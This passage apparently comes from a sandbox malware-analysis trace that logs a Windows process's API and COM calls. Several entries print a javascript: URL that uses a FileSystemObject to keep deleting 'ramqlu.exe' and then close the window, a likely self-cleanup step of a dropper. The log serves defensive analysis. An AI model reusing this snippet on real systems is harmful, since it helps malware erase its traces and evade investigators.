ppv=0x2cf548*=0x436988) returned 0x0 [0073.521] IUnknown:Release (This=0x436988) returned 0x1 [0073.521] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf548 | out: ppv=0x2cf548*=0x436988) returned 0x0 [0073.521] IUnknown:Release (This=0x436988) returned 0x1 [0073.522] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4707d8 [0073.522] GetCurrentThreadId () returned 0x90 [0073.522] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x4707f0 [0073.522] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472050 [0073.522] GetCurrentThreadId () returned 0x90 [0073.522] realloc (_Block=0x0, _Size=0xc8) returned 0x2a511b0 [0073.523] ??2@YAPAXI@Z () returned 0x2a51280 [0073.523] malloc (_Size=0x804) returned 0x2a512a8 [0073.523] ??2@YAPAXI@Z () returned 0x2a51ab8 [0073.523] malloc (_Size=0x104) returned 0x2a51c20 [0073.524] malloc (_Size=0x204) returned 0x2a51d30 [0073.524] malloc (_Size=0x404) returned 0x2a51f40 [0073.525] ??3@YAXPAX@Z () returned 0x1 [0073.525] malloc (_Size=0x40) returned 0x2a51ab8 [0073.525] realloc (_Block=0x2a51ab8, _Size=0x60) returned 0x2a51ab8 [0073.525] malloc (_Size=0x3d0) returned 0x2a52350 [0073.526] ??2@YAPAXI@Z () returned 0x5813d0 [0073.526] free (_Block=0x2a512a8) [0073.526] ??3@YAXPAX@Z () returned 0x1 [0073.526] free (_Block=0x2a51ab8) [0073.526] free (_Block=0x2a51f40) [0073.526] free (_Block=0x2a51d30) [0073.526] free (_Block=0x2a51c20) [0073.526] ??2@YAPAXI@Z () returned 0x2a52728 [0073.526] ??2@YAPAXI@Z () returned 0x2a52760 [0073.526] malloc (_Size=0xc) returned 0x2a52780 [0073.527] ??2@YAPAXI@Z () returned 0x2a52798 [0073.527] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf668 | out: ppv=0x2cf668*=0x436988) returned 0x0 [0073.527] 
IUnknown:Release (This=0x436988) returned 0x1 [0073.527] ??2@YAPAXI@Z () returned 0x2a527e0 [0073.528] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf6b8 | out: ppv=0x2cf6b8*=0x436988) returned 0x0 [0073.529] IUnknown:Release (This=0x436988) returned 0x1 [0073.529] ??2@YAPAXI@Z () returned 0x2a52850 [0073.529] ISystemDebugEventFire:IsActive (This=0x45f140) returned 0x1 [0073.529] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf6b4 | out: ppv=0x2cf6b4*=0x436988) returned 0x0 [0073.530] IUnknown:Release (This=0x436988) returned 0x1 [0073.530] malloc (_Size=0x658) returned 0x2a528d0 [0073.530] GetCurrentThreadId () returned 0x90 [0073.530] GetCurrentThreadId () returned 0x90 [0073.531] GetCurrentThreadId () returned 0x90 [0073.532] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x24) returned 0x453858 [0073.532] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.532] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.564] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x42d8e8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30c) returned 0x473240 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fb88 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fba8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fbc8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fbe8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fc08 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fc28 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, 
Size=0x18) returned 0x46fc48 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fc68 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fc88 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fca8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fcc8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x46fce8 [0073.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x470808 [0073.628] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.628] IsCharSpaceW (wch=0x6f) returned 0 [0073.628] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0073.628] IsCharSpaceW (wch=0x6f) returned 0 [0073.628] ??2@YAPAXI@Z () returned 0x2a52f30 [0073.629] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0073.629] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromProgIDEx") returned 0x76630782 [0073.629] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x2cf27c | out: lpclsid=0x2cf27c*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0 [0073.632] SysStringLen (param_1=0x0) returned 0x0 [0073.632] GetProcAddress (hModule=0x76620000, lpProcName="CoGetClassObject") returned 0x766554ad [0073.632] CoGetClassObject (in: rclsid=0x2cf27c*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf270 | out: ppv=0x2cf270*=0x2a52fa0) returned 0x0 [0074.262] FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fa0, riid=0x74a47884*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, 
Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x2cf26c | out: ppvObject=0x2cf26c*=0x0) returned 0x80004002 [0074.262] FileSystemObject:IClassFactory:CreateInstance (in: This=0x2a52fa0, pUnkOuter=0x0, riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cf274 | out: ppvObject=0x2cf274*=0x2a52fc0) returned 0x0 [0074.262] FileSystemObject:IUnknown:Release (This=0x2a52fa0) returned 0x0 [0074.262] FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fc0, riid=0x74a45a50*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x2cf228 | out: ppvObject=0x2cf228*=0x0) returned 0x80004002 [0074.262] FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fc0, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x2cf214 | out: ppvObject=0x2cf214*=0x0) returned 0x80004002 [0074.262] FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fc0, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x2cf210 | out: ppvObject=0x2cf210*=0x0) returned 0x80004002 [0074.262] FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fc0, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x2cf20c | out: ppvObject=0x2cf20c*=0x0) returned 0x80004002 [0074.262] FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fc0, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x2cf208 | out: ppvObject=0x2cf208*=0x0) returned 
0x80004002 [0074.262] FileSystemObject:IUnknown:QueryInterface (in: This=0x2a52fc0, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cf204 | out: ppvObject=0x2cf204*=0x2a52fc0) returned 0x0 [0074.262] FileSystemObject:IUnknown:Release (This=0x2a52fc0) returned 0x1 [0074.262] GetCurrentThreadId () returned 0x90 [0074.263] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.263] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.263] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45f2a8 [0074.263] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x128) returned 0x476e48 [0074.264] malloc (_Size=0x204) returned 0x2a51280 [0074.264] ??2@YAPAXI@Z () returned 0x2a51490 [0074.300] ??2@YAPAXI@Z () returned 0x2a51510 [0074.300] GetCurrentThreadId () returned 0x90 [0074.300] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.300] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45f2f0 [0074.302] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x46fd08 [0074.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4708c8 [0074.302] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45f338 [0074.302] SetTimer (hWnd=0x202ae, nIDEvent=0x2000, uElapse=0xa, lpTimerFunc=0x0) returned 0x2000 [0074.302] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0074.303] GetProcAddress (hModule=0x76e40000, lpProcName="VariantClear") returned 0x76e43eae [0074.449] GetCurrentThreadId () returned 0x90 [0074.449] GetCurrentThreadId () returned 0x90 [0074.450] ISystemDebugEventFire:IsActive (This=0x45f140) returned 0x1 [0074.450] ??3@YAXPAX@Z () returned 0x1 [0074.450] free (_Block=0x2a511b0) [0074.450] 
GetCurrentThreadId () returned 0x90 [0074.450] GetCurrentThreadId () returned 0x90 [0074.454] GetProcAddress (hModule=0x76e40000, lpProcName=0x93) returned 0x76e44c28 [0074.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x46fd28 [0074.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x4708e0 [0074.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="4475597", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0074.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9) returned 0x4708f8 [0074.454] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="4475597", cchWideChar=-1, lpMultiByteStr=0x4708f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4475597", lpUsedDefaultChar=0x0) returned 8 [0074.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x46fd48 [0074.454] GetProcessHeap () returned 0x410000 [0074.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4613a0 [0074.455] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4708e0 | out: hHeap=0x410000) returned 1 [0074.455] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4708f8 | out: hHeap=0x410000) returned 1 [0074.455] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46c678 | out: hHeap=0x410000) returned 1 [0074.455] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fd28 | out: hHeap=0x410000) returned 1 [0074.459] IInternetProtocol:Read (in: This=0x45435c, pv=0x4543e8, cb=0x800, pcbRead=0x2cf704 | out: pv=0x4543e8, pcbRead=0x2cf704*=0x8) returned 0x0 [0074.459] IInternetProtocol:Read (in: This=0x45435c, pv=0x4543f0, cb=0x7f8, pcbRead=0x2cf704 | out: pv=0x4543f0, pcbRead=0x2cf704*=0x0) returned 0x1 [0074.463] IBindStatusCallback:OnProgress (This=0x453428, ulProgress=0x0, ulProgressMax=0x0, ulStatusCode=0xd, 
szStatusText="text/html") returned 0x0 [0074.465] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.WINSOCK_ACTIVITY") returned 0xc0f7 [0074.465] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.SET_CONNECTOID_NAME") returned 0xc0f6 [0074.465] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.IEXPLORER_EXITING") returned 0xc0fb [0074.465] FindWindowW (lpClassName="MS_AutodialMonitor", lpWindowName=0x0) returned 0x0 [0074.465] FindWindowW (lpClassName="MS_WebCheckMonitor", lpWindowName=0x0) returned 0x1014c [0074.465] PostMessageW (hWnd=0x1014c, Msg=0xc0f7, wParam=0x0, lParam=0x0) returned 1 [0074.592] IBindCtx:GetObjectParam (in: This=0x4503c0, pszKey="__DWNBINDINFO", ppunk=0x2cf62c | out: ppunk=0x2cf62c*=0x0) returned 0x80004005 [0074.592] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc166 [0074.592] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc122 [0074.592] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc190 [0074.592] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc176 [0074.592] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc178 [0074.592] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc177 [0074.593] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc17c [0074.593] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc17d [0074.593] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc17e [0074.593] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc180 [0074.593] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc17f [0074.593] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc182 [0074.593] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc183 [0074.593] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc184 [0074.593] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc191 [0074.593] 
RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc192 [0074.593] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc17a [0074.593] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc17b [0074.593] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc181 [0074.593] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x46fda8 [0074.593] StrCmpICW (pszStr1="text/html", pszStr2="text/xml") returned -16 [0074.593] StrCmpNICW (lpStr1="text/htm", lpStr2="text/css", nChar=8) returned 5 [0074.593] IInternetProtocol:Read (in: This=0x45435c, pv=0x455a10, cb=0x1ff8, pcbRead=0x2cf820 | out: pv=0x455a10, pcbRead=0x2cf820*=0x0) returned 0x1 [0074.593] IBindStatusCallback:OnProgress (This=0x453428, ulProgress=0x8, ulProgressMax=0x8, ulStatusCode=0x4, szStatusText="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0074.593] GetCurrentThreadId () returned 0x90 [0074.593] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x118) returned 0x457b50 [0074.594] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0074.594] MulDiv (nNumber=8, nNumerator=4000, nDenominator=8) returned 4000 [0074.594] PostMessageW (hWnd=0x202ae, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0074.594] IUnknown:QueryInterface (in: This=0x455488, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf7c0 | out: ppvObject=0x2cf7c0*=0x0) returned 0x80004002 [0074.594] IUnknown:QueryInterface (in: This=0x454348, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf7ac | out: ppvObject=0x2cf7ac*=0x0) returned 0x80004002 [0074.594] IBindStatusCallback:OnProgress (This=0x453428, 
ulProgress=0x8, ulProgressMax=0x8, ulStatusCode=0x6, szStatusText="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0074.594] GetCurrentThreadId () returned 0x90 [0074.594] IInternetProtocol:LockRequest (This=0x45435c, dwOptions=0x0) returned 0x0 [0074.594] IBindStatusCallback:RemoteOnDataAvailable (This=0x453428, grfBSCF=0x5, dwSize=0x8, pFormatetc=0x453ec4, pStgmed=0x43f9f8) returned 0x0 [0074.594] IUnknown:QueryInterface (in: This=0x455488, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce3c8 | out: ppvObject=0x2ce3c8*=0x0) returned 0x80004002 [0074.594] IUnknown:QueryInterface (in: This=0x454348, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce380 | out: ppvObject=0x2ce380*=0x0) returned 0x80004002 [0074.594] IUnknown:QueryInterface (in: This=0x455488, riid=0x74be4588*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce3c0 | out: ppvObject=0x2ce3c0*=0x0) returned 0x80004002 [0074.594] IUnknown:QueryInterface (in: This=0x454348, riid=0x74be4588*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ce380 | out: ppvObject=0x2ce380*=0x0) returned 0x80004002 [0074.595] GetCurrentThreadId () returned 0x90 [0074.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x473658 [0074.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x128) returned 0x476f78 [0074.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x470910 [0074.811] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="text/html", 
cchCount1=7, lpString2="charset", cchCount2=7) returned 3 [0074.812] GetCurrentThreadId () returned 0x90 [0074.812] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x200c) returned 0x4770a8 [0074.813] IInternetProtocol:Read (in: This=0x45435c, pv=0x4770bc, cb=0x1ff8, pcbRead=0x2cf6dc | out: pv=0x4770bc, pcbRead=0x2cf6dc*=0x0) returned 0x1 [0074.813] IInternetProtocol:Read (in: This=0x45435c, pv=0x4770bc, cb=0x1ff8, pcbRead=0x2cf6dc | out: pv=0x4770bc, pcbRead=0x2cf6dc*=0x0) returned 0x1 [0074.813] GetCurrentThreadId () returned 0x90 [0074.813] GetCurrentThreadId () returned 0x90 [0074.814] SetEvent (hEvent=0x150) returned 1 [0074.815] IBindStatusCallback:OnStopBinding (This=0x453428, hresult=0x0, szError=0x0) returned 0x0 [0074.815] StrCmpICW (pszStr1="text/html", pszStr2="text/xml") returned -16 [0074.815] IBinding:RemoteGetBindResult (in: This=0x455488, pclsidProtocol=0x2cf7f8, pdwResult=0x2cf7e8, pszResult=0x2cf7dc, dwReserved=0x0 | out: pclsidProtocol=0x2cf7f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), pdwResult=0x2cf7e8*=0x0, pszResult=0x2cf7dc*=0x0) returned 0x0 [0074.815] IUri:GetScheme (in: This=0x43c254, pdwScheme=0x2cf7f4 | out: pdwScheme=0x2cf7f4*=0xf) returned 0x0 [0074.816] GetCurrentThreadId () returned 0x90 [0074.816] GetCurrentThreadId () returned 0x90 [0074.816] SetEvent (hEvent=0x150) returned 1 [0074.816] CoTaskMemFree (pv=0x0) [0074.816] IInternetProtocolRoot:Terminate (This=0x45435c, dwOptions=0x0) returned 0x0 [0074.816] IUnknown:Release (This=0x4555f0) returned 0x4 [0074.816] ReleaseBindInfo (pbindinfo=0x454380) [0074.817] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0075.374] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0075.375] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0075.375] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) 
returned 1 [0075.647] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0075.647] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0075.647] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x2ce1ec | out: ppURI=0x2ce1ec*=0x43bfcc) returned 0x0 [0075.648] IUnknown:QueryInterface (in: This=0x43bfcc, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2ce1c4 | out: ppvObject=0x2ce1c4*=0x43bfcc) returned 0x0 [0075.648] IUnknown:Release (This=0x43bfcc) returned 0x4 [0075.648] IUnknown:AddRef (This=0x43bfcc) returned 0x5 [0075.648] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x118) returned 0x457c78 [0075.648] IUnknown:Release (This=0x43bfcc) returned 0x4 [0075.648] IUnknown:Release (This=0x43bfcc) returned 0x3 [0075.648] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x47a1e0 [0075.648] FindResourceW (hModule=0x73710000, lpName=0x1fe, lpType=0x6) returned 0x2e084d0 [0075.648] LoadResource (hModule=0x73710000, hResInfo=0x2e084d0) returned 0x2e2e53c [0075.648] LockResource (hResData=0x2e2e53c) returned 0x2e2e53c [0075.648] VirtualQuery (in: lpAddress=0x2e2e53c, lpBuffer=0x2cf394, dwLength=0x1c | out: lpBuffer=0x2cf394*(BaseAddress=0x2e2e000, AllocationBase=0x2b50000, AllocationProtect=0x2, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0075.648] SizeofResource (hModule=0x73710000, hResInfo=0x2e084d0) returned 0xe6 [0075.648] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x200) returned 0x47a2e8 [0075.648] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a1e0 | out: hHeap=0x410000) returned 1 [0075.648] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457c78 | out: hHeap=0x410000) returned 1 [0075.648] RtlReAllocateHeap (Heap=0x410000, 
Flags=0x0, Ptr=0x47a2e8, Size=0x136) returned 0x47a2e8 [0075.649] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x13a) returned 0x47a428 [0075.649] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppu=0x2cf550 | out: ppu=0x2cf550) returned 0x0 [0075.649] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0075.649] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0075.649] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0075.649] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x28) returned 0x4538e8 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44f9f0 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x47a588 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x28) returned 0x453918 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44fa48 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x68) returned 0x473780 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c2d8 [0075.650] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4c) returned 0x44faa0 [0075.650] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473780 | out: hHeap=0x410000) returned 1 [0075.650] GetSystemDefaultLCID () returned 0x409 [0075.650] GetVersionExW (in: lpVersionInformation=0x2cf420*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x410174, dwBuildNumber=0x45ca30, dwPlatformId=0x410000, szCSDVersion="㝸G") | out: lpVersionInformation=0x2cf420*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0075.650] GetKeyboardLayoutList (in: nBuff=32, lpList=0x2cf3a0 | out: 
